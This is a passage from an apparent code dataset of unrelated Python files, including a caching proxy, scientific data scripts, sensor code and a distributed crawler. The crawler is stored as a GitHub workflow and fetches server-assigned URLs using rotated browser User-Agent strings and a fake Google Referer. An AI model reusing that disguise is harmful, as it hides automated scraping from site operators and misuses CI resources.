self.owner,\n 'format' : 'slideshow',\n 'eadid' : self.collectionid,\n }\n mets = self.get_item_mets(shortid, **args)\n self.write_file(shortid, mets)\n\n \n def handle(self):\n filepath = settings.DATA_BASE_PATH + '/csv/' + CSV_FILE_NAME\n csvfile = open(filepath, 'rU')\n spamreader = csv.DictReader(csvfile)\n for row in spamreader:\n self.handle_item(row)\n\nif __name__ == '__main__':\n from tripod2.local import owners\n colid = __file__[:-3]\n m = Tripod2Munger(colid)\n m.handle()\n\n #import doctest\n #doctest.testmod(globs={'m':m, 'groupid' : groupid, 'owners' : owners})\n #m.handle()","sub_path":"local/mungers/csv2mets/alexharris.py","file_name":"alexharris.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"157820910","text":"\n\"\"\"\n分布式爬虫处理;包括取任务、执行任务、上报结果\n\"\"\"\n\nimport requests\nfrom requests.adapters import HTTPAdapter\nimport platform\nimport time\nimport json\nimport random\nimport logging\nimport gzip\nimport hashlib\nfrom datetime import datetime, timedelta\n\nAPI_URL = 'https://ohmyrss.com'\n\nDVC_ID = 'Github-Action'\nDVC_TYPE = 'robot'\nDVC_VER = '1.1.1'\nDVC_EXT = {\n 'pf': platform.platform(),\n 'sys': platform.system(),\n 'sysver': platform.version(),\n 'ver': DVC_VER,\n 'lat': '',\n 'lon': '',\n 'model': '',\n}\n\nUAS = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/74.0.835.163 Safari/535.1',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/78.0',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/13.0 Safari/534.50',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/5.0)',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Edg/83.0.478.54',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1 (KHTML, like Gecko) Version/13.0.3 Safari/605.1',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) 
Gecko/20100101 Firefox/78.0',\n 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1',\n 'Mozilla/5.0 (CrKey armv7l 1.5.16041) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.0 Safari/537.36',\n]\n\n\ndef md5(src):\n return hashlib.md5(src.encode('utf8')).hexdigest()\n\n\ndef current_hk_day():\n return (datetime.utcnow() + timedelta(hours=8)).strftime(\"%Y%m%d\")\n\n\ndef get_a_job():\n try:\n rsp = requests.post(API_URL + '/api/job/get', data={\n \"dvc_id\": DVC_ID,\n \"dvc_type\": DVC_TYPE,\n \"sign\": md5(f\"{DVC_ID}{DVC_TYPE}{current_hk_day()}\"),\n \"dvc_ext\": json.dumps(DVC_EXT),\n \"ver\": DVC_VER,\n }, timeout=30)\n\n if rsp.ok:\n return rsp.json()\n except:\n logging.warning(\"获取任务出现异常!\")\n\n return None\n\n\ndef handle_job(job):\n try:\n headers = {'User-Agent': random.choice(UAS), 'Referer': 'https://www.google.com'}\n rsp = requests.get(job['url'], headers=headers, timeout=30)\n\n if rsp.ok:\n job['rsp'] = rsp.text\n job['rsp_url'] = rsp.url\n return True\n else:\n logging.warning(f\"执行任务失败:`{job}`{rsp.status_code}\")\n except:\n logging.warning(f\"执行任务出现异常:`{job}\")\n\n return False\n\n\ndef giveback_job(job):\n try:\n rsp = requests.post(API_URL + '/api/job/giveback', data={\n \"id\": job['id'],\n \"url\": job['url'],\n }, timeout=30)\n\n if rsp.ok:\n return True\n else:\n logging.warning(f\"交还任务失败:`{job}\")\n except:\n logging.warning(f\"交还任务出现异常:`{job}\")\n\n return False\n\n\ndef finish_job(job):\n # 这里做两次重试,确保数据传输可靠性;并做请求体压缩\n s = requests.Session()\n s.mount('http://', HTTPAdapter(max_retries=2))\n s.mount('https://', HTTPAdapter(max_retries=2))\n\n try:\n body = json.dumps({\n \"id\": job['id'],\n \"url\": job['url'],\n \"rsp\": job['rsp'],\n \"rsp_url\": job['rsp_url'],\n })\n body = gzip.compress(bytes(body, 'utf8'))\n rsp = s.post(API_URL + '/api/job/finish', data=body, timeout=30, headers={'Content-Encoding': 'gzip'})\n\n if rsp.ok:\n logging.info(f\"任务执行成功:`{job['id']}`{job['url']}\")\n return True\n else:\n logging.warning(f\"结束任务失败:`{job['id']}`{job['url']}\")\n except:\n logging.warning(f\"结束任务出现异常:`{job['id']}`{job['url']}\")\n\n return False\n\n\n# 间隔时间,受服务器控制\nbusy_sleep = 5\nstart_ts = int(time.time())\n\n\nwhile True:\n if int(time.time()) - start_ts > 10*60:\n exit(0)\n\n job = get_a_job()\n\n if job is None:\n exit(0)\n else:\n if job.get('sleep'):\n busy_sleep = job['sleep'][0]\n\n # 开始处理,失败则交还\n if not handle_job(job):\n giveback_job(job)\n # 额外 sleep,等待任务被其他端认领\n time.sleep(busy_sleep)\n else:\n finish_job(job)\n\n time.sleep(busy_sleep)\n","sub_path":".github/workflows/mpwx_ga.py","file_name":"mpwx_ga.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"187686831","text":"def matching(*args, **kwargs):\n \"\"\"Download all open-access SXS files matching the input arguments\n\n Files will be output into subdirectories named for the SXS ID of each matching record found on\n Zenodo. For example, if the Zenodo record contains 'SXS:BBH:1234', the files will be placed\n into a subdirectory named 'SXS_BBH_1234'. If only the highest Lev is desired (the default), the\n files will be placed directly into that subdirectory; otherwise, additional levels of\n subdirectories will be created as needed.\n\n Parameters\n ==========\n file: string or multiple strings as non-keyword arguments\n Zenodo file name to match. 
This will be compiled as a regex, so it can include python-style\n regex matches or partial completions.\n sxs_ids: list of strings (defaults to ['SXS:BBH:'])\n Keyword argument only. SXS IDs to be searched for in the Zenodo deposit's title. Each will\n be compiled as a regex, so it can include python-style regex matches or partial completions.\n highest_lev_only: bool (defaults to True)\n Keyword argument only. If True, only download only files from the highest-numbered Lev.\n dry_run: bool (defaults to False)\n If True, don't actually download anything; just show what would be downloaded.\n\n \"\"\"\n import traceback\n import re\n import requests\n from .. import sxs_id as sxs_id_finder\n from .. import lev_regex\n from ..utilities import download\n from .api.records import Records\n from tqdm.autonotebook import tqdm\n\n file_name_matches = [re.compile(f) for f in args]\n sxs_id_matches = kwargs.pop('sxs_ids', ['SXS:BBH:'])\n if isinstance(sxs_id_matches, str):\n sxs_id_matches = [sxs_id_matches,]\n sxs_id_matches = [re.compile(i) for i in sxs_id_matches]\n highest_lev_only = kwargs.pop('highest_lev_only', True)\n lev_path_re = re.compile(lev_regex + r'/')\n dry_run = kwargs.pop('dry_run', False)\n\n def local_path(sxs_id, filename):\n \"\"\"Return the local filename where you want to save this file\"\"\"\n if not filename.startswith(sxs_id):\n filename = sxs_id + '/' + filename\n filename = filename.replace(':', '_')\n if highest_lev_only:\n filename = re.sub(lev_path_re, '', filename)\n return filename\n\n def title_matches(title):\n for sxs_id in sxs_id_matches:\n if sxs_id.search(title):\n return True\n return False\n\n def file_matches(file_name):\n for file_name_match in file_name_matches:\n if file_name_match.search(file_name):\n return True\n return False\n\n print('Retrieving all open-access records belonging to the \"sxs\" community on Zenodo.')\n all_records = Records.search(q='communities:sxs AND access_right:open')\n\n matching_records = [record for record in all_records if title_matches(record.get('metadata', {}).get('title', {}))]\n print('Retrieved {0} records in total, of which {1} have matching SXS IDs.'.format(len(all_records), len(matching_records)))\n\n for record in tqdm(matching_records):\n try: # We probably don't want this entire script to abort if something goes wrong with one record\n title = record['metadata']['title']\n sxs_id = sxs_id_finder(title)\n print('\\nWorking on \"{0}\"'.format(sxs_id))\n\n all_files = record['files']\n\n if highest_lev_only:\n files_to_download = {}\n for file_description in all_files:\n filename = file_description['filename']\n if file_matches(filename):\n search = lev_path_re.search(filename)\n if search:\n lev = search['lev']\n generic_filename = filename.replace('Lev{0}/'.format(lev), 'Lev{0}/')\n files_to_download[generic_filename] = files_to_download.get(generic_filename, []) + [lev,]\n else:\n files_to_download[filename] = ['']\n files_to_download = [key.format(max(files_to_download[key])) for key in files_to_download]\n files_to_download = [f for f in all_files if f['filename'] in files_to_download]\n else:\n files_to_download = [f for f in all_files if file_matches(f['filename'])]\n\n for file_description in files_to_download:\n url = file_description['links']['download']\n filename = file_description['filename']\n path = local_path(sxs_id, filename)\n print('\\tDownloading \"{0}\" to \"{1}\"'.format(filename, path))\n if not dry_run:\n download(url, path)\n\n except KeyboardInterrupt: # Don't catch Ctrl-C, so that 
interrupting this iteration will interrupt the entire loop\n raise\n\n except: # For anything else, just print the error, and continue\n traceback.print_exc()\n","sub_path":"sxs/zenodo/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"485179546","text":"import numpy as np\nimport pandas as pd\nimport datetime as dt\nfrom itertools import *\n\nstations_pd = pd.read_csv('/Volumes/GoogleDrive/My Drive/PhD (1)/2022_Winter/Dissertation_v13/South_America/Venezuela/Total_Stations_Venezuela_WL_v0.csv')\n\nIDs = stations_pd['SERIAL'].tolist()\nCOMIDs = stations_pd['COMID'].tolist()\nNames = stations_pd['ESTACION'].tolist()\n\n#Read in streamflow data\n\ndf = pd.read_csv(r'/Volumes/GoogleDrive/My Drive/PhD (1)/2020_Winter/Dissertation_v9/South_America/Venezuela/NIVEL.csv',encoding='unicode_escape')\n\nfor id, name, comid in zip(IDs, Names, COMIDs):\n\n\tprint(id, ' - ', name, ' - ', comid)\n\n\t# Get dataset for the current station\n\tid = int(id)\n\tdata = df[df['SERIAL'] == id]\n\n\t# Get years, months, and parameters from dataset\n\tYEARs = data['ANO'].tolist()\n\tMONTHs = data['MES'].tolist()\n\tPARAs = data['PARA'].tolist()\n\n\tdates = []\n\tvalues = []\n\tlong_months = [1, 3, 5, 7, 8, 10, 12]\n\tshort_months = [4, 6, 9, 11]\n\n\tfor year, month, para in zip(YEARs, MONTHs, PARAs):\n\t\t# Make a list of days depending on length of month\n\t\tif month in long_months: # 31 day month\n\t\t\tdays = list(range(1, 32))\n\t\telif month in short_months: # 30 day month\n\t\t\tdays = list(range(1, 31))\n\t\telif month == 2: # February\n\t\t\tyear = int(year)\n\t\t\tif year % 4 == 0: # Leap year, 29 days\n\t\t\t\tdays = list(range(1, 30))\n\t\t\telif year % 4 != 0: # Non leap year, 28 days\n\t\t\t\tdays = list(range(1, 29))\n\n\t\t# Add current month's dates to datetime list\n\t\tfor day in days:\n\t\t\tdates.append(dt.datetime(year, month, day))\n\n\t\t# Get dataset for just the current month and year\n\t\tyear = int(year)\n\t\tyear_df = data[data['ANO'] == year]\n\t\tmonth = int(month)\n\t\tmonth_df = year_df[year_df['MES'] == month]\n\n\t\t# Get a list of the streamflow values for the current month\n\t\tmonth_values = month_df.iloc[:, 5:len(days) + 5]\n\t\tmonth_values = month_values.replace(-1, np.NaN)\n\t\tmonth_values = month_values.values\n\n\t\t# Parameter conversion\n\t\tif para == 8150:\n\t\t\tmonth_values = month_values / 1000\n\t\telif para == 8155:\n\t\t\tmonth_values = month_values * 10\n\n\t\t# Add current month's data to list\n\t\tfor value in month_values:\n\t\t\tvalues.append(value)\n\n\t# Convert multi-dimensional list to 1D list\n\tvalues = chain.from_iterable(values)\n\n\t# Create dataframe from values and datetime lists, and export to .csv\n\tfinal_df = pd.DataFrame(values, index=dates, columns=['Water Level (cm)'])\n\tfinal_df.index.name = 'Datetime'\n\twhile np.isnan(final_df.iloc[:, 0].values[0]):\n\t\tfinal_df = final_df.iloc[1:]\n\twhile np.isnan(final_df.iloc[:, 0].values[len(final_df.iloc[:, 0].values) - 1]):\n\t\tfinal_df = final_df.iloc[:len(final_df.iloc[:, 0].values) - 2]\n\n\tdatesObservedDischarge = pd.date_range(final_df.index[0], final_df.index[len(final_df.index) - 1], freq='D')\n\tdf2 = pd.DataFrame(np.nan, index=datesObservedDischarge, columns=['Water Level (cm)'])\n\tdf2.index.name = 'Datetime'\n\n\t#print(df2)\n\n\tdf3 = df2.fillna(final_df)\n\n\t#print(df3)\n\n\tdf3.to_csv('/Volumes/GoogleDrive/My Drive/PhD 
(1)/2022_Winter/Dissertation_v13/South_America/Venezuela/data/historical/Observed_Data_WL/{}.csv'.format(id))","sub_path":"Venezuela/get_historical_observed_WL.py","file_name":"get_historical_observed_WL.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"578780896","text":"from argparse import ArgumentParser\nimport sys\nfrom math import ceil\nfrom methplotlib.version import __version__\nfrom datetime import datetime as dt\nfrom time import time\nimport logging\n\n\nclass Region(object):\n def __init__(self, region):\n self.chromosome, interval = region.replace(',', '').split(':')\n self.begin, self.end = [int(i) for i in interval.split('-')]\n self.size = self.end - self.begin\n self.string = \"{}_{}_{}\".format(self.chromosome, self.begin, self.end)\n\n\ndef make_windows(full_window, max_size=1e6):\n full_reg = Region(full_window)\n if full_reg.size > max_size:\n chunks = ceil(full_reg.size / max_size)\n chunksize = ceil(full_reg.size / chunks)\n return [\n Region(\"{}:{}-{}\".format(\n full_reg.chromosome,\n full_reg.begin + i * chunksize,\n full_reg.begin + (i + 1) * chunksize))\n for i in range(chunks)]\n else:\n return [full_reg]\n\n\ndef get_args():\n parser = ArgumentParser(description=\"plotting nanopolish methylation calls or frequency\")\n parser.add_argument(\"-v\", \"--version\",\n help=\"Print version and exit.\",\n action=\"version\",\n version='methplotlib {}'.format(__version__))\n parser.add_argument(\"-m\", \"--methylation\",\n nargs='+',\n help=\"nanopolish methylation calls or frequency output\",\n required=True if \"--example\" not in sys.argv else False)\n parser.add_argument(\"-n\", \"--names\",\n nargs='+',\n help=\"names of datasets in --methylation\",\n required=True if \"--example\" not in sys.argv else False)\n parser.add_argument(\"-w\", \"--window\",\n help=\"window (region) to which the visualisation has to be restricted\",\n required=True if \"--example\" not in sys.argv else False)\n parser.add_argument(\"-g\", \"--gtf\",\n help=\"add annotation based on a gtf file matching to your reference genome\")\n parser.add_argument(\"-b\", \"--bed\",\n help=\"add annotation based on a bed file matching to your reference genome\")\n parser.add_argument(\"--simplify\",\n help=\"simplify annotation track to show genes rather than transcripts\",\n action=\"store_true\")\n parser.add_argument(\"--split\",\n help=\"split, rather than overlay the methylation tracks\",\n action=\"store_true\")\n parser.add_argument(\"--smooth\",\n help=\"When plotting frequencies points are averaged using a rolling window\",\n type=int,\n default=5)\n parser.add_argument(\"--example\",\n action=\"store_true\",\n help=\"Show example command and exit.\")\n args = parser.parse_args()\n if not args.example and not len(args.names) == len(args.methylation):\n sys.exit(\"INPUT ERROR: Expecting the same number of names as datasets!\")\n return args\n\n\ndef init_logs(args):\n \"\"\"Initiate log file and log arguments.\"\"\"\n start_time = dt.fromtimestamp(time()).strftime('%Y%m%d_%H%M')\n logname = \"methplotlib_\" + start_time + \".log\"\n handlers = [logging.FileHandler(logname)]\n logging.basicConfig(\n format='%(asctime)s %(message)s',\n handlers=handlers,\n level=logging.INFO)\n logging.info('methplotlib {} started.\\nPython version is: {}\\nArguments are: {}'.format(\n __version__, sys.version.replace('\\n', ' '), 
args))\n","sub_path":"methplotlib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"11284297","text":"import socket\nimport os\nimport time \n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n \nhost = \"\"\nportr = 20000\nports = 12345\n\n#server binds to port 12345\ns.bind((host, ports))\ns.listen(5)\n\nprint('Server listening....')\n\nwhile True:\n\n #setting up client\n r = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n r.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n\n #client connects to main server\n try:\n r.connect((host, portr))\n except Exception as e:\n print('Server error')\n time.sleep(6)\n\n #server accepting connection from browser\n conn, addr = s.accept()\n\n #the caching array\n cache = []\n try:\n with open(\"cache\", \"r\") as cache_var:\n cache = [w.strip() for w in cache_var.readlines()]\n except:\n print(\"Cache doesn't exist\")\n print('\\n\\ncache = ', end =\" \")\n print(cache)\n \n #receiving request from browser\n data = conn.recv(1024)\n data = data.decode('utf-8')\n\n #filtering all other requests\n if \"http://localhost:\" not in data:\n continue\n\n #getting the file name\n temp = data.split( )[1]\n filename = temp.split(\"/\")[3]\n\n if filename in cache:\n print(filename + \" in cache\")\n\n #generate request with If-Modified-Since header\n if_header = 'If-Modified-Since: ' + time.strftime(\"%a %b %d %H:%M:%S %Y\", time.strptime(time.ctime(os.path.getmtime(filename)), \"%a %b %d %H:%M:%S %Y\")) + '\\r\\n\\r\\n'\n if_request = data[:-2] + if_header\n if_request = if_request.replace(\"http://localhost:\" + str(portr), \"\")\n\n #sending request to main server\n r.send(bytearray(if_request, 'utf-8'))\n\n #recieving if response from main server\n if_response = b''\n while True:\n packet = r.recv(1024)\n if not packet:\n break\n if_response += packet\n temporary = if_response[:228].decode('utf-8')\n response_code = temporary.split(\" \")[1]\n\n #Not modified\n if response_code == \"304\":\n print(\"Not Modified\")\n #open file in cache\n try:\n with open(filename, \"rb\") as f:\n cache_response = f.read()\n except Exception as e:\n print(\"Error opening the file from cache\")\n print(e)\n cache.remove(filename)\n\n #send response to browser\n conn.send(cache_response)\n\n #Modified\n elif response_code == \"200\":\n print(\"Modified\")\n #update file in cache\n try:\n with open(filename, \"wb\") as f:\n f.write(if_response)\n except Exception as e:\n print(\"Error opening the file from cache\")\n print(e)\n cache.remove(filename)\n\n #send response to browser\n conn.send(if_response)\n\n else:\n print(filename + \" not in cache\")\n\n #forwarding request to main server\n request = data.replace(\"http://localhost:\" + str(portr), \"\")\n r.send(bytearray(request, 'utf-8'))\n\n #recieving response from main server\n response = b''\n while True:\n packet = r.recv(1024)\n if not packet:\n break\n response += packet\n\n #storing new file into cache\n if filename != '':\n #cache length is maxinmum of 3\n if len(cache) < 3:\n cache.append(filename)\n else:\n cache.append(filename)\n temp_file = cache[0]\n cache.remove(temp_file)\n\n #remove the old file from the directory\n try:\n os.remove(temp_file)\n except Exception as e:\n print(e)\n print(\"ERROR: \" + temp_file + \" does not exist\")\n\n #create new file for new entry in cache\n with open(filename, \"wb\") as 
new_file:\n                    new_file.write(response)\n\n        #send response to browser\n        conn.send(response)\n\n    #update cache file with new entries\n    with open(\"cache\", \"w\") as cache_var:\n        cache_list = \"\\n\".join(cache)\n        cache_var.write(cache_list)\n\n    #close the server connection and client connection\n    conn.close()\n    r.close()\n","sub_path":"proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"230236526","text":"\"\"\"\nGiven a string, your task is to reverse the vowels of string.\n\nInput:\nThe first line of input contains an integer T denoting the number of test cases. Then T test cases follow. Each test case contains a string.\n\nOutput:\nPrint the string with the vowels reversed.\n\nConstraints:\n1<=T<=10^5\n1<=length of the string<=10^5\n\nExample:\nInput:\n2\nhello world\ngeeks for geeks\n\nOutput:\nhollo werld\ngeeks for geeks\n\"\"\"\nt=int(input())\nfor i in range(t):\n    s=list(input())\n    v=['a','e','i','o','u']\n    l=[]\n    for i in s:\n        if i in v:\n            l.append(i)\n    l=l[::-1]\n    val=0\n    for i in range(len(s)):\n        if(s[i] in v):\n            s[i]=l[val]\n            val+=1\n    for i in s:\n        print(i,end=\"\")\n    print()\n","sub_path":"reverse vowels.py","file_name":"reverse vowels.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"78770510","text":"filename = input(\"Enter a file name: \")\nhandle = None\n\nif filename == \"na na boo boo\":\n    print(\"NA NA BOO BOO TO YOU - You have been punk'd!\")\nelse:\n    try:\n        handle = open(f\"files/{filename}\", 'r')\n    except FileNotFoundError:\n        print(\"Failed to open file.\")\n        quit()\n\n    prefix = \"X-DSPAM-Confidence:\"\n    numbers = []\n\n    for line in handle:\n        if line.startswith(prefix):\n            numbers.append(\n                float(line[len(prefix):].strip())\n            )\n\n    average = sum(numbers) / len(numbers)\n    print(\"Average spam confidence:\", average)","sub_path":"chapter-8/exercise-3.py","file_name":"exercise-3.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"407654368","text":"import numpy as np\nimport cv2\nimport random\nimport sys\n\nif len(sys.argv) != 3:\n\tprint(\"usage : python3 src dst\\n\")\n\tsys.exit(1)\n\t\nfor i in range(10):\n\torig_path = sys.argv[1] + str(i) + \".jpg\"\n\torig = cv2.imread(orig_path)\n\tprint(\"image : [%s] is loaded...\\n\" % orig_path)\n\t\n\tdummy, invs = cv2.threshold(cv2.resize(cv2.cvtColor(orig, cv2.COLOR_BGR2GRAY),(28,28)),\t\n\t\t\t\t\t\t\t0xFF>>1, 0xFF, cv2.THRESH_BINARY_INV)\n\n\theight, width = invs.shape\n\tcv2.imshow(\"original\", invs)\n\tcv2.moveWindow(\"original\", 0, 0)\n\n\tfor j in range(1000):\n\t\ttgt = invs\n\t\t#blur distortion\n\t\tmode = random.randrange(0,3)\n\t\tif mode == 0:\t\t\n\t\t\tksize = (random.randrange(1,3) * 2 + 1, random.randrange(1,3) * 2 + 1)\n\t\t\ttgt = cv2.blur(tgt, ksize)\n\t\telif mode == 1:\n\t\t\tksize = (random.randrange(1,3) * 2 + 1, random.randrange(1,3) * 2 + 1)\n\t\t\ttgt = cv2.GaussianBlur(tgt, ksize, 0)\n\t\telse:\n\t\t\tmsize = random.randrange(1, 3) * 2 + 1\n\t\t\ttgt = cv2.medianBlur(tgt, msize)\n\n\t\t#rotate distortion\n\t\tangle = random.uniform(-5.0, 5.0) \n\t\tMatrix = cv2.getRotationMatrix2D((width>>1, height>>1), angle, 1)\n\t\ttgt = cv2.warpAffine(tgt, Matrix, (width, height))\n\n\t\t#shift distortion\t\n\t\tif random.randrange(0, 2) == 0:\n\t\t\tdirection = 
1\n\t\telse:\n\t\t\tdirection = -1\n\t\tdx = random.randrange(0, width >> 3)\n\t\tdy = random.randrange(0, height >> 3)\n\t\tMatrix = np.float32([[1, 0, direction * dx], [0, 1, direction * dy]])\n\t\ttgt = cv2.warpAffine(tgt, Matrix, (width, height))\n\t\n\t\t#scale distortion\n\t\tfactor_w = random.uniform(0.25, 1.0)\n\t\tfactor_h = random.uniform(0.25, 1.0)\n\t\ttgt = cv2.resize(cv2.resize(tgt, None, fx=factor_w, fy=factor_h), (width, height))\t\t\n\n\t\t#save distortion image\n\t\t#dummy, tgt = cv2.threshold(tgt, 0xFF>>1, 0xFF, cv2.THRESH_BINARY)\t\n\t\tcv2.imshow(\"tgt\", tgt)\n\t\tcv2.moveWindow(\"tgt\",0,300)\n\t\tcv2.waitKey(5)\n\t\tcv2.imwrite(sys.argv[2] + str(i) + \"/\" + str(j) + \".bmp\", tgt)\n","sub_path":"NeuralNetwork/DB/dbmaker.py","file_name":"dbmaker.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"514903012","text":"import matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nfrom os.path import join\nimport numpy as np\nimport matplotlib as mpl\nimport logging\n\nscr_dir = os.path.dirname(os.path.realpath(__file__))\n\n# set logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nlogger.addHandler(ch)\nformatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n# fh = logging.FileHandler(join(scr_dir, '...\\\\logs\\\\plot_tsa_subframes.log'))\n# fh.setFormatter(formatter)\n# logger.addHandler(fh)\n\nfile = 'S1-TSA_1Y_geom_water_X_v01.csv'\n\nhome_dir = join(scr_dir, '..\\\\auxdata', 'tsa')\nos.chdir(home_dir)\n\n\ndef read_and_format(file):\n df = pd.read_csv(file, header=0, )\n df = df.rename(columns={df.columns[0]: \"Datetime\"})\n df = df.rename(columns={'relativeOrbitNumber_start': 'RON'})\n df['Datetime'] = df['Datetime'].apply(lambda x: x[17:32])\n df['Datetime'] = pd.to_datetime(df['Datetime'], format='%Y%m%dT%H:%M:%S')\n df = df.set_index('Datetime')\n df = df.drop('.geo', 1)\n return df\n\n\ndf = read_and_format(file)\ncols = ['VV_p50', 'angle', 'RON', 'platform_number']\ndf = df[cols]\ndf = df[df['RON'].isin([15, 37, 139])]\ndf['RON'] = df['RON'].astype(int).astype(str)\ndf = df[df['platform_number'] == 'A']\n\ndfg = df.groupby(['RON']) # , 'platform_number'])\n\n\ndfg['VV_p50'].plot(\n linestyle='--',\n linewidth=2.0,\n figsize=(17, 8))\nplt.title('Sentinel-1A time series 10/2014-09/2018 - relative orbits')\nplt.legend(['S1A Orbit 133', 'S1A Orbit 15', 'S1A Orbit 37'],\n loc=1, prop={'size': 10})\nplt.xlabel('Date')\nplt.ylabel(r'Backscatter $\\sigma^0$')\n# dfg.boxplot(by='RON')\n\n\ntab = df.groupby('RON').agg({'VV_p50': ['min', 'max', 'mean'],\n 'angle': ['mean', 'std']})\nprint(tab)\nplt.show()\n","sub_path":"application/archiv/plot_tsa_subframes.py","file_name":"plot_tsa_subframes.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"108446451","text":"# -*- coding: cp1257 -*-\n\nimport Adafruit_DHT as tempsensor\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_SSD1306\nimport mh_z19\n\nimport time\nfrom datetime import datetime as clock\nfrom datetime import timedelta\n\nimport os\nimport sys\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\nimport subprocess\n\n\nDHT_SENSOR = tempsensor.DHT22\nDHT_PIN = 4\nSAMPLE_TIME = 60\n\n\n\ntry:\n os.remove('testlog.csv')\n\nexcept:\n pass\n\ntry:\n \n file = 
open('/home/pi/Study_Fresh/Alpha/testlog.csv', 'a+')\n    \n    if os.stat('/home/pi/Study_Fresh/Alpha/testlog.csv').st_size == 0:\n        \n        file.write('Timestamp (MM/DD/YYYY HH:MM),Temperature (°C),Humidity (%),Co2 (ppm)\r\n')\n        \nexcept:\n    pass\n\nRST = 24\n# 128x64 display with hardware I2C:\ndisp = Adafruit_SSD1306.SSD1306_128_64(rst = RST)\n\n\n# Initialize library.\ndisp.begin()\n\n# Clear display.\ndisp.clear()\n\n# Create blank image for drawing.\n# Make sure to create image with mode '1' for 1-bit color.\nwidth = disp.width\nheight = disp.height\nimage = Image.new('1', (width, height))\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\n\n# Draw a black filled box to clear the image.\ndraw.rectangle((0, 0, width, height), outline = 0, fill = 0)\n\n\n# First define some constants to allow easy resizing of shapes.\npadding = 1\ntop = padding\nbottom = height-padding\n# Move left to right keeping track of the current x position for drawing shapes.\nx = 0\n\n# Load default font.\nfont = ImageFont.truetype('Mario-Kart-DS.ttf',36)\n\ndraw.text((x, top + 1), \"study\", font=font, fill=255)\ndraw.text((x, top + 33), \" fresh\", font=font, fill=255)\n\ndisp.image(image)\ndisp.display()\ntime.sleep(1)\n\ndraw.rectangle((0, 0, width, height), outline = 0, fill = 0)\n\nfont = ImageFont.truetype('Mario-Kart-DS.ttf',40)\ndraw.text((x, top + 1), \"BY UQ\", font=font, fill=255)\n\nfont = ImageFont.truetype('VCR_OSD_MONO_1.001.ttf',16)\ndraw.text((x, top + 47), \" loading...\", font=font, fill=255)\n\n# Display image.\ndisp.image(image)\ndisp.display()\n\nfont = ImageFont.truetype('VCR_OSD_MONO_1.001.ttf',15)\n\ntry:\n    \n    # Get Sensor Data\n    humidity, temperature = tempsensor.read_retry(DHT_SENSOR, DHT_PIN)\n    Co2 = mh_z19.read_all()['co2'] \n    \n    # Draw a black filled box to clear the image.\n    draw.rectangle((0,0,width,height), outline=0, fill=0)\n    \n    # Write 
